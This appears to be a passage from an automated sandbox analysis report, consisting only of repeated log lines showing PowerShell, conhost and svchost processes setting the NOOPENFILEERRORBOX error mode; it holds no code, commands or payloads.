                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
